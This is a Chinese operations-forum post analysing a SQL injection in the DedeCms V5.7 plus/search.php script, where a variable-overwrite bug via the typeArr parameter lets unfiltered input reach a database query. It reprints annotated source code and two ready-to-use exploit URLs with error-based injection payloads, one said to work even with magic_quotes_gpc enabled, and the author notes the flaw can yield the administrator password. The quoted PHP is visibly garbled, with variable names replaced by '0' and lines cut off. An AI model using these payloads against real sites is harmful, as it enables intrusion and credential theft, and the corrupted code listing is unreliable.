设为首页 收藏本站

运维网

查看: 534|回复: 0

[经验分享] DedeCms V57 plus/search.php文件SQL注射

[复制链接]

尚未签到

发表于 2018-10-24 09:43:36 | 显示全部楼层 |阅读模式
  微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
  作者: c4rp3nt3r@0x50sec.org
  Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
  黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
  ============
  Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

  •   require_once(dirname(__FILE__).”/../include/common.inc.php”);
  •   require_once(DEDEINC.”/arc.searchview.class.php”);

  •   $pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
  •   0id = (isset(0id) && is_numeric(0id)) ? 0id : 0;
  •   $channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
  •   $kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
  •   $mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;

  •   if(!isset($orderby)) $orderby=”;
  •   else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);


  •   if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
  •   else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);

  •   if(!isset($keyword)){
  •   if(!isset($q)) $q = ”;
  •   $keyword=$q;
  •   }

  •   $oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

  •   //查找栏目信息
  •   if(empty(0id))
  •   {
  •   0nameCacheFile = DEDEDATA.’/cache/typename.inc’;
  •   if(!file_exists(0nameCacheFile) || filemtime(0nameCacheFile) < time()-(3600*24) )
  •   {
  •   $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
  •   fwrite($fp, “SetQuery(“Select>
  •   $dsql->Execute();
  •   while($row = $dsql->GetArray())
  •   {
  •   fwrite($fp, “\0Arr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
  •   }
  •   fwrite($fp, ‘?’.'>’);
  •   fclose($fp);
  •   }
  •   //引入栏目缓存并看关键字是否有相关栏目内容
  •   require_once(0nameCacheFile);
  •   //0Arr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
  •   //
  •   if(isset(0Arr) && is_array(0Arr))
  •   {
  •   foreach(0Arr as $id=>0name)
  •   {

  •   $keywordn = str_replace(0name, ‘ ‘, $keyword);  //这个地方要绕过
  •   if($keyword != $keywordn)
  •   {
  •   $keyword = $keywordn;
  •   0id = $id; // 这里存在变量覆盖漏洞使 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0; 这句过滤成了摆设
  •   break;
  •   }
  •   }
  •   }
  •   }
  然后plus/search.php文件下面定义了一个 Search类的对象 .
  在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
  $this->TypeLink = new TypeLink(0id);
  TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.

  •   class TypeLink
  •   {
  •   var 0Dir;
  •   var $dsql;
  •   var $TypeID;
  •   var $baseDir;
  •   var $modDir;
  •   var $indexUrl;
  •   var $indexName;
  •   var $TypeInfos;
  •   var $SplitSymbol;
  •   var $valuePosition;
  •   var $valuePositionName;
  •   var $OptionArrayList;

  •   //构造函数///////
  •   //php5构造函数
  •   function __construct(0id)
  •   {
  •   $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
  •   $this->indexName = $GLOBALS['cfg_indexname'];
  •   $this->baseDir = $GLOBALS['cfg_basedir'];
  •   $this->modDir = $GLOBALS['cfg_templets_dir'];
  •   $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
  •   $this->dsql = $GLOBALS['dsql'];
  •   $this->TypeID = 0id;
  •   $this->valuePosition = ”;
  •   $this->valuePositionName = ”;
  •   $this->typeDir = ”;
  •   $this->OptionArrayList = ”;

  •   //载入类目信息

  •   $query = “SELECT tp.*,ch.typename as
  •   ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
  •   `#@__channeltype` ch
  •   on ch.id=tp.channeltype  WHERE tp.id=’0id’ “; //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿

  •   if(0id > 0)
  •   {
  •   $this->TypeInfos = $this->dsql->GetOne($query);
  利用代码一 需要 即使magic_quotes_gpc = Off
  http:// /plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
  这只是其中一个利用代码… Search 类的构造函数再往下

  •   ……省略
  •   $this->TypeID = 0id;
  •   ……省略
  •   if($this->TypeID==”0″){
  •   $this->ChannelTypeid=1;
  •   }else{

  •   $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE>
  •   //现在不鸡肋了吧亲…
  •   $this->ChannelTypeid=$row['channeltype'];

  •   }
  利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
  http:// /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
  如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站


运维网声明 1、欢迎大家加入本站运维交流群:群①:263444886群②:197202523群③:485755530群④:201730672群⑤:202807635运维网交流群⑥:281548029
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、其他单位或个人使用、转载或引用本文时必须注明原文的出处
4、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
5、运维网 - 服务您的运维操作管理专家!
6、联系人Email:admin@yunvn.com 网址:www.iyunv.com

点击关注更多内容
您需要登录后才可以回帖 登录 | 立即注册  

本版积分规则  允许回帖邮件提醒楼主

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服 E-mail:kefu@yunvn.com

本站由青云提供云计算服务

运维网--中国最专业的运维工程师交流社区

京ICP备14039699号-1 Copyright © 2012-2018

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

Good good study day day up !


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


独家合作伙伴: 青云cloud

快速回复 返回顶部 返回列表